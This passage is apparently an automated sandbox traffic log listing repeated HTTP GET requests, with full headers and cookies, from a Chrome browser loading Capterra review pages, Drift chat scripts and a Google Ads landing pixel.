cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/css/ad6d42fbadcc79ec.css HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/css/50b7e331868b2bdc.css HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/css/a4a58254eecf0029.css HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/css/09c885b096621154.css HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /core/assets/js/24.f9f5e493.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/17.17dea2aa.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/css/8dc898c46ca225c7.css HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /pagead/landing?gcs=G111&gcd=13t3t3t3t5l1&tag_exp=101529666&rnd=264372747.1725034611&url=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&dma=0&npa=0&gtm=45He48s0n81P4GLD4Nv76106154za200&auid=1810143887.1725034608 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ar_debug=1; IDE=AHWqTUnshLIM_CA9spkc8qZwYRIRrmQl4yeqfJZGLqc8fJU-I1ZDHzeNKdWNuA9P
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/5664.58cbb27e06b11751.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/6577.5b5e609812e044d0.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7357.225fc1d616fbda8a.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8977.dc99403a46707026.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3445.1bd0170ed561aadb.js HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 